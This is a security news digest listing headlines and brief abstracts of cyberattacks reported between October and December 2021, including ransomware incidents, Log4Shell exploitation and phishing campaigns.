Shutterfly hit by ransomware attack Full Text
Abstract
Photography company Shutterfly announced this week that it had been hit by a ransomware attack that had impacted some services, making it the latest in a string of companies to be targeted by hackers looking for a payout.The Hill
December 27, 2021
A new wave of ech0raix ransomware attacks targets QNAP NAS devices Full Text
Abstract
A new wave of ech0raix ransomware attacks is targeting QNAP network-attached storage (NAS) devices. The threat actors behind the ech0raix ransomware are targeting QNAP network-attached storage (NAS) devices. Users reported numerous compromises of their...Security Affairs
December 27, 2021
Experts monitor ongoing attacks using exploits for Log4j library flaws Full Text
Abstract
Researchers from DrWeb monitored attacks leveraging exploits for vulnerabilities in the Apache Log4j library. Researchers from DrWeb monitored attacks leveraging exploits for vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, and CVE-2021-42550)...Security Affairs
December 26, 2021
French IT services provider Inetum hit by BlackCat ransomware attack Full Text
Abstract
The IT services company Inetum Group was hit by a ransomware attack a few days before the Christmas holiday. French IT services company Inetum Group was hit by a ransomware attack a few days before the Christmas holiday, but according to the company...Security Affairs
December 24, 2021
Global IT services provider Inetum hit by ransomware attack Full Text
Abstract
Less than a week before the Christmas holiday, French IT services company Inetum Group was hit by a ransomware attack that had a limited impact on the business and its customers.BleepingComputer
December 23, 2021
Watch out for Christmas 2021 credential stuffing attacks! Full Text
Abstract
A study by Arkose Labs has revealed that there were over two billion credential stuffing attacks during the last 12 months, growing exponentially during the period from October 2020 to September 2021.Help Net Security
December 21, 2021
Log4j Vulnerability Aftermath Full Text
Abstract
Uptycs researchers have observed attacks related to miners, DDoS malware and some variants of ransomware actively leveraging the Log4Shell flaw in Log4j. Last week the Log4j vulnerability turned the internet upside down. The impact of the vulnerability...Security Affairs
December 20, 2021
Decentralized Finance Protocol Grim Finance Suffers 5x Reentrancy Attack Full Text
Abstract
The attacker exploited the protocol’s vault contract through five reentrancy loops, which allowed them to fake five additional deposits into a vault while the platform is processing the first deposit.Coin Telegraph
December 20, 2021
Belgian defense ministry hacked by attackers exploiting Apache vulnerability Full Text
Abstract
Belgium’s Ministry of Defense was recently hacked by attackers exploiting the massive vulnerability in Apache logging library log4j that has become a worldwide security concern, according to multiple reports.The Hill
December 20, 2021
Belgian defense ministry hit by cyberattack exploiting Log4Shell bug Full Text
Abstract
The Belgian defense ministry was hit by a cyber attack; it seems that threat actors exploited the Log4Shell vulnerability. The Belgian defense ministry confirmed it was hit by a cyberattack; it seems that threat actors exploited the Log4Shell vulnerability....Security Affairs
December 20, 2021
Kronos Attack Impacts Payroll Data of 150,000 Sainsbury’s Employees Full Text
Abstract
The supermarket chain is understood to have lost about a week's worth of data for its 150,000 employees in the United Kingdom. But it said they would be paid before Christmas.BBC
December 17, 2021
Logistics giant warns of BEC emails following ransomware attack Full Text
Abstract
Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.BleepingComputer
December 17, 2021
PseudoManuscrypt, a mysterious massive cyber espionage campaign Full Text
Abstract
Tens of thousands of devices worldwide, including many industrial control systems (ICS), have been hit by the PseudoManuscrypt spyware. Kaspersky researchers reported that tens of thousands of devices belonging to industrial and government organizations...Security Affairs
December 16, 2021
‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems Full Text
Abstract
It’s similar to Lazarus’s Manuscrypt malware, but the new spyware is splattering itself onto government organizations and ICS in a non-Lazarus-like, untargeted wave of attacks.Threatpost
December 16, 2021
Log4j attackers switch to injecting Monero miners via RMI Full Text
Abstract
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.BleepingComputer
December 16, 2021
More Details on Log4Shell Attacks Full Text
Abstract
A few days back, we got to know that threat actors are abusing a critical vulnerability—Log4Shell—in Log4j and propagating malware. Now, the attacks have grown more severe as new details emerge.Cyware Alerts - Hacker News
December 16, 2021
McMenamins breweries hit by a Conti ransomware attack Full Text
Abstract
Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company's operations.BleepingComputer
December 16, 2021
Portland-based Hotel and Brewpub Chain Suffers Cyberattack Likely Impacting Employee Data Full Text
Abstract
Hotel and brewpub chain McMenamins was hit with a ransomware attack that may have compromised employees' personal information, but no customer payment information appears to have been impacted.KGW
December 14, 2021
Telecom operators targeted in recent espionage hacking campaign Full Text
Abstract
Researchers have spotted a new espionage campaign targeting telecommunication and IT service providers in the Middle East and Asia.BleepingComputer
December 14, 2021
400 Banks’ Customers Targeted with Anubis Trojan Full Text
Abstract
The new campaign masqueraded as an Orange Telecom account management app to deliver the latest iteration of Anubis banking malware.Threatpost
December 14, 2021
Human resource management group hit by ransomware attack Full Text
Abstract
Ultimate Kronos Group (UKG), a human resources management provider, was hit by a ransomware attack earlier this week, the company confirmed.The Hill
December 14, 2021
Virginia General Assembly’s IT unit hit by ransomware attack Full Text
Abstract
The information technology unit for Virginia’s General Assembly has been hit by a ransomware attack, which barred legislators and staff from accessing the system that handles bills.The Hill
December 10, 2021
Over 1.6 Million WordPress Sites Targeted in Couple of Days with Attacks on Plugins and Themes Full Text
Abstract
Wordfence researchers spotted a massive wave of attacks in the last couple of days targeting over 1.6 million WordPress sites from 16,000 IPs via four different plugins and several Epsilon Framework themes.Security Affairs
December 10, 2021
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses Full Text
Abstract
As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes. WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions. The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018. The impacted Epsilon Framework themes and their corresponding versions are as follows: Activello (<=1.4.1) Affluent (<1.1.0) Allegiant (<=1.2.5) Antreas (<=1.0.6) Bonkers (<=1.0.5) Brilliance (<=1.2.9) Illdy (<=2.1.6)The Hacker News
December 10, 2021
1.6 million WordPress sites targeted in the last couple of days Full Text
Abstract
Wordfence experts detected a massive wave of attacks in the last couple of days that targeted over 1.6 million WordPress sites. Wordfence researchers spotted a massive wave of attacks in the last couple of days targeting over 1.6 million...Security Affairs
December 10, 2021
Ransomware Attack at Payroll Provider Frontier Software Leaks Data on Australian Government Workers Full Text
Abstract
South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software.ZDNet
December 10, 2021
Massive attack against 1.6 million WordPress sites underway Full Text
Abstract
Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.BleepingComputer
December 9, 2021
US Food Importer Firm Atalanta Suffers Ransomware Attack Full Text
Abstract
Upon becoming aware of the malicious activity, Atalanta engaged third-party specialists and began to remediate the situation, including conducting a forensic investigation into the incident.The Daily Swig
December 8, 2021
CS Energy foiled a ransomware attack Full Text
Abstract
A cyberattack hit CS Energy in Australia on Saturday, November 27; experts believe the attack was orchestrated by Chinese hackers. A ransomware cyberattack hit a major energy network operated by CS Energy; the attack could have had dramatic consequences...Security Affairs
December 07, 2021
US universities targeted by Office 365 phishing attacks Full Text
Abstract
US universities are being targeted in multiple phishing attacks designed to impersonate college login portals to steal valuable Office 365 credentials.BleepingComputer
December 07, 2021
Nordic Choice Hotels hit by Conti ransomware, no ransom demand yet Full Text
Abstract
Nordic Choice Hotels has now confirmed a cyber attack on its systems from the Conti ransomware group. Although there is no indication of card or payment information being affected, information pertaining to guest bookings was potentially leaked.BleepingComputer
December 6, 2021
330 SPAR stores close or switch to cash-only payments after a cyberattack Full Text
Abstract
A cyber attack hit the international supermarket franchise SPAR forcing 330 shops in North East England to shut down. A cyberattack hit the international supermarket franchise SPAR impacting the operations at 330 shops in North East England. Many...Security Affairs
December 6, 2021
DMEA Colorado electric utility hit by a disruptive cyberattack Full Text
Abstract
A ransomware attack hit an electric utility in Colorado, causing significant disruption and damage. The Delta-Montrose Electric Association (DMEA) is a local electric cooperative located in Colorado and part of Touchstone Energy Cooperatives. The...Security Affairs
December 03, 2021
Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks Full Text
Abstract
Enterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months. The issue, assigned the identifier CVE-2021-44515, is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server. "If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution," Zoho cautioned in an advisory. "As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible." The company has also made available an Exploit Detection Tool that will help customers identify sigThe Hacker News
December 03, 2021
Researchers discover 14 new data-stealing web browser attacks Full Text
Abstract
IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox.BleepingComputer
December 1, 2021
Widespread ‘Smishing’ Campaign Defrauds Iranian Android Users Full Text
Abstract
Attackers use socially engineered SMS messages and malware to compromise tens of thousands of devices and drain user bank accounts.Threatpost
November 30, 2021
EwDoor Botnet Is Attacking AT&T Customers Full Text
Abstract
According to 360 Netlab, EwDoor has so far gone through three versions, and its main functions fall into two categories: DDoS attacks and backdoor access.Netlab
November 30, 2021
New Attack Campaign Abuses Legitimate Remote Administrator Tools and Spreads via Fake Cryptocurrency Websites Full Text
Abstract
Trend Micro researchers discovered a new cryptocurrency-related campaign that abuses a legitimate Russian RAT known as Safib Assistant via a newer version of the malware called SpyAgent.Trend Micro
November 29, 2021
IKEA Hit by Email Reply-Chain Cyberattack Full Text
Abstract
IKEA, king of furniture-in-a-flat-box, warned employees on Friday that an ongoing cyberattack was using internal emails to malspam malicious links in active email threads.Threatpost
November 29, 2021
Panasonic confirmed that its network was illegally accessed by attackers Full Text
Abstract
Panasonic disclosed a security breach after threat actors gained access to its servers storing potentially sensitive information. Japanese electronics giant Panasonic disclosed a security breach after threat actors gained access to some servers of the company...Security Affairs
November 29, 2021
Biopharmaceutical firm Supernus Pharmaceuticals hit by Hive ransomware during an ongoing acquisition Full Text
Abstract
Biopharmaceutical company Supernus Pharmaceuticals discloses a ransomware attack; the Hive ransomware group claims to have stolen company data. Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware...Security Affairs
November 27, 2021
IKEA hit by a cyber attack that uses stolen internal reply-chain emails Full Text
Abstract
Threat actors are targeting IKEA employees in an internal phishing campaign leveraging stolen reply-chain emails. According to BleepingComputer, threat actors are targeting IKEA employees in phishing attacks using stolen reply-chain emails. Once...Security Affairs
November 26, 2021
IKEA email systems hit by ongoing cyberattack Full Text
Abstract
IKEA is battling an ongoing cyberattack where threat actors are targeting employees in internal phishing attacks using stolen reply-chain emails.BleepingComputer
November 26, 2021
Marine services provider Swire Pacific Offshore (SPO) hit by Clop ransomware Full Text
Abstract
Marine services provider Swire Pacific Offshore (SPO) has suffered a Clop ransomware attack that resulted in the theft of company data. Clop ransomware hit marine services provider Swire Pacific Offshore (SPO) and stole company data, but did not affect...Security Affairs
November 25, 2021
Printjack Attacks Can Turn Printers Into Zombies Full Text
Abstract
According to a team of Italian researchers, a large number of printers are publicly exposed on the internet, making it easy for attackers to send malicious data remotely.Cyware Alerts - Hacker News
November 24, 2021
Hackers exploit Microsoft MSHTML bug to steal Google, Instagram creds Full Text
Abstract
A newly discovered Iranian threat actor is stealing Google and Instagram credentials belonging to Farsi-speaking targets worldwide using a new PowerShell-based stealer dubbed PowerShortShell by security researchers at SafeBreach Labs.BleepingComputer
November 24, 2021
Ukraine arrests ‘Phoenix’ hackers behind Apple phishing attacks Full Text
Abstract
The Security Service of Ukraine (SSU) has arrested five members of the international 'Phoenix' hacking group who specialize in the remote hacking of mobile devices.BleepingComputer
November 23, 2021
TA406 Accelerates Attacks; Launches Several Campaigns Full Text
Abstract
Security researchers issued an in-depth report on malicious activities of TA406, an alleged North Korean group. Its attack volume has been rising since the beginning of this year. As the year commenced, its activities were ramped up as journalists, foreign policy experts, and non-governmental orga ...Cyware Alerts - Hacker News
November 23, 2021
Observing Attacks Against Hundreds of Exposed Services in Public Clouds Full Text
Abstract
Researchers found that 80% of the 320 honeypots were compromised within 24 hours and all of the honeypots were compromised within a week, with some of them facing hundreds of attacks.Palo Alto Networks
November 22, 2021
Biomanufacturing companies getting hit by hackers potentially linked to Russia Full Text
Abstract
Large biomanufacturing companies, including those that produce medications and vaccines tied to the COVID-19 pandemic, are being targeted by hackers potentially tied to Russia, researchers disclosed Monday.The Hill
November 22, 2021
Iran’s Mahan Air claims it has foiled a cyber attack, hackers say the opposite Full Text
Abstract
Iranian airline Mahan Air was hit by a cyberattack on Sunday morning; the “Hooshyarane Vatan” hacker group claimed responsibility for the attack. Iranian private airline Mahan Air has foiled a cyber attack over the weekend, Iranian state media...Security Affairs
November 22, 2021
Iran’s Biggest Private Airline Faces Cyberattack Targeting its Internal Systems Full Text
Abstract
Mahan Air is Iran's main private airline and the second biggest after the national carrier Iran Air. It has been on the blacklist of Iranian companies targeted by US sanctions since 2011.Security Week
November 22, 2021
Hackers hit Iran’s Mahan airline, claim confidential data theft Full Text
Abstract
One of Iran's largest privately-owned airlines, Mahan Air, has announced a cybersecurity incident that has resulted in its website going offline and potentially data loss.BleepingComputer
November 20, 2021
Microsoft Exchange servers hacked in internal reply-chain attacks Full Text
Abstract
Threat actors are hacking Microsoft Exchange servers using ProxyShell and ProxyLogon exploits to distribute malware and bypass detection using stolen internal reply-chain emails.BleepingComputer
November 18, 2021
New Side Channel Attacks Re-Enable Serious DNS Cache Poisoning Attacks Full Text
Abstract
Researchers have demonstrated yet another variant of the SAD DNS cache poisoning attack that leaves about 38% of the domain name resolvers vulnerable, enabling attackers to redirect traffic originally destined to legitimate websites to a server under their control. "The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache," University of California researchers Keyu Man, Xin'an Zhou, and Zhiyun Qian said. "SAD DNS attack allows an attacker to redirect any traffic (originally destined to a specific domain) to his own server and then become a man-in-the-middle (MITM) attacker, allowing eavesdropping and tampering of the communication." The latest flaw affects Linux kernels as well as popular DNS software, including BIND, Unbound, and dnsmasq running on top of Linux, but not when run on other operating systems such as FreeBSD or Windows. From Kaminsky Attack to SAD DNS: DNS cache poisoning, also called DNS spoofing, is a technique iThe Hacker News
November 16, 2021
WordPress sites are being hacked in fake ransomware attacks Full Text
Abstract
A new wave of attacks starting late last week has hacked close to 300 WordPress sites to display fake encryption notices, trying to trick the site owners into paying 0.1 bitcoin for restoration.BleepingComputer
November 16, 2021
TikTok scammers tried hacking 125 targets that followed famous accounts, researchers find Full Text
Abstract
More than 125 people and businesses associated with large TikTok accounts based around the world were targeted as part of a recent phishing campaign, according to research published Tuesday.Cyberscoop
November 15, 2021
FBI Says Its System Was Exploited to Email Fake Cyberattack Alert Full Text
Abstract
The alert was mumbo jumbo, but it was indeed sent from the bureau’s email system, from the agency’s own internet address.Threatpost
November 15, 2021
Moses Staff hackers wreak havoc on Israeli orgs with ransomless encryptions Full Text
Abstract
A new hacker group named Moses Staff has recently claimed responsibility for numerous attacks against Israeli entities, which appear politically motivated as they do not make any ransom payment demands.BleepingComputer
November 14, 2021
Updated: Hundreds of thousands of fake warnings of cyberattacks sent from a hacked FBI email server Full Text
Abstract
Threat actors hacked email servers of the FBI to distribute spam email impersonating FBI warnings of fake cyberattacks. The email servers of the FBI were hacked to distribute spam email impersonating the Department of Homeland Security (DHS) warnings...Security Affairs
November 12, 2021
Microsoft warns of surge in HTML smuggling phishing attacks Full Text
Abstract
Microsoft has seen a surge in malware campaigns using HTML smuggling to distribute banking malware and remote access trojans (RAT).BleepingComputer
November 11, 2021
Back-to-Back PlayStation 5 Hacks Hit on the Same Day Full Text
Abstract
Cyberattackers stole PS5 root keys and exploited the kernel, revealing rampant insecurity in gaming devices.Threatpost
November 10, 2021
Stor-a-File hit by ransomware through SolarWinds Serv-U Full Text
Abstract
Stor-a-File, a U.K.-based data capture and storage company, suffered a ransomware attack in August that exploited an unpatched instance of SolarWinds' Serv-U FTP software.The Register
November 10, 2021
PhoneSpy: Android spyware campaign targeting South Korean users Full Text
Abstract
An ongoing spyware campaign dubbed 'PhoneSpy' targets South Korean users via a range of lifestyle apps that nest in the device and silently exfiltrate data.BleepingComputer
November 09, 2021
Medical software firm urges password resets after ransomware attack Full Text
Abstract
Medatixx, a German medical software vendor whose products are used in over 21,000 health institutions, urges customers to change their application passwords following a ransomware attack that has severely impaired its entire operations.BleepingComputer
November 08, 2021
MediaMarkt hit by Hive ransomware, initial $240 million ransom Full Text
Abstract
Electronics retail giant MediaMarkt has suffered a Hive ransomware attack with an initial ransom demand of $240 million, causing IT systems to shut down and store operations to be disrupted in the Netherlands and Germany.BleepingComputer
November 5, 2021
Ukraine Names Russian FSB Officers Involved in Gamaredon Cyberattacks Full Text
Abstract
Ukraine’s security service, the SBU, has revealed the identities of five individuals allegedly involved in cyberattacks attributed to a Russia-linked threat group named Gamaredon.Security Week
November 4, 2021
Labour hit by ‘cyber incident’ affecting members’ data Full Text
Abstract
The party said the impact of the incident, affecting an external supplier, was not yet clear and it was urgently investigating whether the data had been hacked. Police, cybersecurity specialists and regulators had been notified, it added.The Guardian
November 2, 2021
ATMs, Internal Network, and Mobile Apps Impacted by Destructive Attack at Pakistan’s State-owned Commercial Bank Full Text
Abstract
The incident impacted the bank’s backend systems and affected servers used to interlink the bank’s branches, the backend infrastructure controlling the bank’s ATM network, and the bank’s mobile apps.The Record
November 2, 2021
The Toronto Transit Commission (TTC) hit by a ransomware attack Full Text
Abstract
A ransomware attack hit the systems at the Toronto Transit Commission public transportation agency and disrupted its operations. The Toronto Transit Commission announced on Friday that its systems have been infected with ransomware, the attack began...Security Affairs
October 31, 2021
Minecraft Japanese gamers hit by Chaos ransomware using alt lists as lure Full Text
Abstract
Chaos Ransomware operators target gamers' Windows devices using Minecraft alt lists as a lure and promoting them on gaming forums. Minecraft is one of the most popular games in the world, it had more than 140 million monthly active players in August...Security Affairs
October 31, 2021
Graff multinational jeweller hit by Conti gang. Data of its rich clients are at risk, including Trump and Beckham Full Text
Abstract
Conti ransomware gang hit high society jeweller Graff and threatens to release private details of world leaders, actors and tycoons. The latest attack of the Conti ransomware gang makes the headlines, the threat actors hit high society jeweller Graff...Security Affairs
October 30, 2021
REvil and SolarMarker Employ SEO Poisoning Attacks Full Text
Abstract
Researchers highlight two separate campaigns dropping REvil and SolarMarker backdoors leveraging the SEO poisoning method to spread payloads in the systems of targeted victims.Cyware Alerts - Hacker News
October 30, 2021
Ransomware Attack Hits PNG Finance Ministry Full Text
Abstract
Ransomware infiltrated and compromised a core server at the department of finance last week, hampering the government's access to foreign aid, its ability to pay cheques, and carry out other basic functions in the midst of a spiraling Covid-19 surge.Security Week
October 29, 2021
Papua New Guinea’s finance ministry was hit by a ransomware attack Full Text
Abstract
A ransomware attack hit Papua New Guinea's finance ministry and disrupted government payments and operations. Government officials confirmed that Papua New Guinea's finance ministry was hit by a ransomware attack that disrupted government payments...Security Affairs
October 28, 2021
UltimaSMS Victimizes Millions in Fraud Campaign Full Text
Abstract
A fraud campaign, dubbed UltimaSMS, is signing up users to premium SMS subscription services without their consent and knowledge. Promoted mostly via Instagram and TikTok, these Android apps have over 10.5 million downloads and involve at least 151 malicious apps. Stay cautious!Cyware Alerts - Hacker News
October 27, 2021
NRA hit by Russian-linked ransomware attack: reports Full Text
Abstract
The National Rifle Association (NRA) has been hit by a ransomware attack, becoming the latest victim of a massive spike in these attacks this year, according to multiple reports Wednesday.The Hill
October 27, 2021
Abuse of Discord CDN Witnesses Significant Rise Full Text
Abstract
A recent investigation conducted by RiskIQ revealed that threat actors abused the Discord channel to deliver a total of 27 unique malware families. This included backdoors, password stealers, spyware, and trojans.Cyware Alerts - Hacker News
October 27, 2021
Latest Report Uncovers Supply Chain Attacks by North Korean Hackers Full Text
Abstract
Lazarus Group, the advanced persistent threat (APT) group attributed to the North Korean government, has been observed waging two separate supply chain attack campaigns as a means to gain a foothold into corporate networks and target a wide range of downstream entities. The latest intelligence-gathering operation involved the use of MATA malware framework as well as backdoors dubbed BLINDINGCAN and COPPERHEDGE to attack the defense industry, an IT asset monitoring solution vendor based in Latvia, and a think tank located in South Korea, according to a new Q3 2021 APT Trends report published by Kaspersky. In one instance, the supply-chain attack originated from an infection chain that stemmed from legitimate South Korean security software running a malicious payload, leading to the deployment of the BLINDINGCAN and COPPERHEDGE malware on the think tank's network in June 2021. The other attack on the Latvian company in May is an "atypical victim" for Lazarus, theThe Hacker News
October 26, 2021
Ranzy Locker ransomware hit tens of US companies in 2021 Full Text
Abstract
The FBI published a flash alert to warn of the activity of the Ranzy Locker ransomware that had already compromised tens of US companies. The FBI published a flash alert to warn of Ranzy Locker ransomware operations that had already compromised at least...Security Affairs
October 26, 2021
UltimaSMS subscription fraud campaign targeted millions of Android users Full Text
Abstract
UltimaSMS, a massive fraud campaign, is using Android apps with millions of downloads to subscribe victims to premium subscription services. Researchers from Avast have uncovered a widespread premium SMS scam on the Google Play Store, tracked as UltimaSMS,...Security Affairs
October 25, 2021
New hacking efforts show Russia undeterred by US actions Full Text
Abstract
A year after Russian government hackers compromised almost a dozen U.S. federal agencies, renewed efforts by the same group to target the global IT supply chain are painting a picture of a defiant Russia undeterred by U.S. efforts to clamp down on malicious cyber activity.The Hill
October 25, 2021
Millions of Android users targeted in subscription fraud campaign Full Text
Abstract
A new SMS scam campaign relying upon 151 apps has been uncovered, with many of these apps managing to find their way into the Play Store where they amassed 10.5 million downloads.BleepingComputer
October 24, 2021
NYT Journalist Repeatedly Hacked with Pegasus after Reporting on Saudi Arabia Full Text
Abstract
The iPhone of New York Times journalist Ben Hubbard was repeatedly hacked with NSO Group's Pegasus spyware tool over a three-year period stretching between June 2018 to June 2021, resulting in infections twice in July 2020 and June 2021. The University of Toronto's Citizen Lab, which publicized the findings on Sunday, said the "targeting took place while he was reporting on Saudi Arabia, and writing a book about Saudi Crown Prince Mohammed bin Salman." The research institute did not attribute the infiltrations to a specific government. In a statement shared with Hubbard, the Israeli company denied its involvement in the hacks and dismissed the findings as "speculation," while noting that the journalist was not "a target of Pegasus by any of NSO's customers." To date, NSO Group is believed to have leveraged at least three different iOS exploits — namely an iMessage zero-click exploit in December 2019, a KISMET exploit targeting iOS 13The Hacker News
October 24, 2021
SmashEx Attack Reaches Most Secure Areas of Intel CPUs to Steal Data Full Text
Abstract
Academic researchers developed a new attack technique, dubbed SmashEx, that targets Intel SGX enclaves and can allow adversaries to steal confidential data from Intel CPUs. The vulnerability, tracked by Intel as CVE-2021-0186, allows attackers to inject an asynchronous exception during the code ... Read MoreCyware Alerts - Hacker News
October 24, 2021
Phishing Campaign Targeting High-profile YouTubers Unmasked Full Text
Abstract
High-profile YouTube creators have been targeted with cookie-theft malware in phishing attacks, wherein hackers offered them fake collaboration opportunities. Google has identified around 15,000 actor accounts specifically created for this campaign. YouTube users are recommended to be aware of th ... Read MoreCyware Alerts - Hacker News
October 22, 2021
‘Lone Wolf’ Hacker Group Targeting Afghanistan and India with Commodity RATs Full Text
Abstract
A new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the adversary to gain complete control over the compromised endpoints. Cisco Talos attributed the cyber campaign to a "lone wolf" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and Taliban dating all the way back to 2016. The attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting CVE-2017-11882 to execute a PowerShell command that's responsible for deploying additional malware toThe Hacker News
October 22, 2021
Swiss exhibitions organizer MCH Group hit by cyberattack Full Text
Abstract
Swiss events organizer and marketing company MCH Group was hit by a malware attack on Wednesday (October 20). The firm says it is working to get systems up and running again.The Daily Swig
October 21, 2021
Gigabyte Allegedly Hit by AvosLocker Ransomware Full Text
Abstract
If AvosLocker stole Gigabyte’s master keys, threat actors could force hardware to download fake drivers or BIOS updates in a supply-chain attack a la SolarWinds.Threatpost
October 21, 2021
Massive campaign uses YouTube to push password-stealing malware Full Text
Abstract
Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers.BleepingComputer
October 21, 2021
Evil Corp demands $40 million in new Macaw ransomware attacks Full Text
Abstract
Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from making ransom payments.BleepingComputer
October 20, 2021
Google: YouTubers’ accounts hijacked with cookie-stealing malware Full Text
Abstract
Google says YouTube creators have been targeted with password-stealing malware in phishing attacks coordinated by financially motivated threat actors since at least late 2019.BleepingComputer
October 20, 2021
New Gummy Browsers attack lets hackers spoof tracking profiles Full Text
Abstract
University researchers in the US have developed a new fingerprint capturing and browser spoofing attack called Gummy Browsers. They warn how easy the attack is to carry out and the severe implications it can have.BleepingComputer
October 20, 2021
Google says Russian-speaking hackers hijacked YouTube channels for cryptocurrency scam Full Text
Abstract
Google on Wednesday reported it has tracked and disrupted an email phishing campaign tied to Russian-speaking hackers that has targeted YouTube users since 2019 as part of a cryptocurrency scam effort.The Hill
October 20, 2021
New Stealth Phishing Campaign Targets Financial Organizations Full Text
Abstract
Morphisec Labs unearthed a new MirrorBlast campaign aimed at financial services across Canada, the U.S., Europe, Hong Kong, and others. The campaign has an uncanny resemblance to the Russia-based TA505 group. Organizations must protect themselves with adequate protection solutions, such as anti-phi ... Read MoreCyware Alerts - Hacker News
October 19, 2021
Acer hacked twice in a week by the same threat actor Full Text
Abstract
Acer has suffered a second cyberattack in just a week by the same hacking group that says other regions are vulnerable.BleepingComputer
October 18, 2021
Sinclair Confirms Ransomware Attack That Disrupted TV Stations Full Text
Abstract
A major cyberattack resulted in data being stolen, too, but Sinclair’s not sure which information is now in the hands of the crooks.Threatpost
October 18, 2021
Sinclair Broadcast Group hit by ransomware attack Full Text
Abstract
Sinclair Broadcast Group, one of the nation’s largest television station operators, announced Monday that it had been hit by a ransomware attack over the weekend that resulted in data theft and network disruption.The Hill
October 18, 2021
Suspected Chinese hackers behind attacks on ten Israeli hospitals Full Text
Abstract
A joint announcement from the Ministry of Health and the National Cyber Directorate in Israel describes a spike in ransomware attacks over the weekend that targeted the systems of nine health institutes in the country.BleepingComputer
October 15, 2021
Twitch downplays this month’s hack, says it had minimal impact Full Text
Abstract
In an update regarding this month's security incident, Twitch downplayed the breach saying that it had minimal impact and it only affected a small number of users.BleepingComputer
October 15, 2021
Boffins devise a new side-channel attack affecting all AMD CPUs Full Text
Abstract
A group of researchers from the Graz University of Technology and CISPA Helmholtz Center for Information Security devised a new side-channel attack that affects AMD CPUs. Researchers Moritz Lipp and Daniel Gruss of the Graz University of Technology...Security Affairs
October 15, 2021
Verizon-owned Visible Acknowledges Hack, Confirms Account Manipulations Full Text
Abstract
The company came forward and confirmed the attack in a Twitter thread, writing that it was "aware of an issue in which some member accounts were accessed and/or charged without their authorization."ZDNet
October 15, 2021
Three more ransomware attacks hit Water and Wastewater systems in 2021 Full Text
Abstract
A joint cybersecurity advisory published by US agencies revealed three ransomware attacks on water and wastewater systems this year. A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched...Security Affairs
October 14, 2021
Israeli Hospital Forced to Cancel Non-Urgent Procedures Due to Ransomware Attack Full Text
Abstract
Israel’s National Cyber Directorate (INCD) is urging organizations across the country to bolster their cyber defenses following a disruptive ransomware attack against a hospital in Israel’s northwest.The Daily Swig
October 14, 2021
For the first time, an Israeli hospital was hit by a major ransomware attack Full Text
Abstract
The Hillel Yaffe Medical Center in Hadera, Israel, was hit by a ransomware attack that was defined by Israel's National Cyber Directorate as a "major" attack. The Hillel Yaffe Medical Center in Hadera, Israel was hit by a ransomware attack that impacted...Security Affairs
October 14, 2021
New Yanluowang ransomware used in highly targeted attacks on large orgs Full Text
Abstract
Researchers spotted a new strain of ransomware, dubbed Yanluowang, that was used in highly targeted attacks against enterprises. Researchers from Symantec Threat Hunter Team discovered a ransomware family, tracked as Yanluowang ransomware that was used...Security Affairs
October 14, 2021
New Yanluowang ransomware used in targeted enterprise attacks Full Text
Abstract
A new and still under development ransomware strain is being used in highly targeted attacks against enterprise entities as Broadcom's Symantec Threat Hunter Team discovered.BleepingComputer
October 13, 2021
Verizon digital carrier Visible customer accounts were hacked Full Text
Abstract
Visible, a US digital wireless carrier owned by Verizon, admitted that some customer accounts were hacked after dealing with technical problems in the past couple of days.BleepingComputer
October 12, 2021
Olympus US systems hit by cyberattack over the weekend Full Text
Abstract
Olympus, a leading medical technology company, was forced to take down IT systems in the Americas (U.S., Canada and Latin America) following a cyberattack that hit its network Sunday, on October 10, 2021.BleepingComputer
October 11, 2021
Pacific City Bank discloses ransomware attack claimed by AvosLocker Full Text
Abstract
Pacific City Bank (PCB), one of the largest Korean-American community banking service providers in America, has disclosed a ransomware incident that took place last month.BleepingComputer
October 10, 2021
Previously undetected FontOnLake Linux malware used in targeted attacks Full Text
Abstract
ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that has been employed in targeted attacks. ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that was employed in targeted...Security Affairs
October 9, 2021
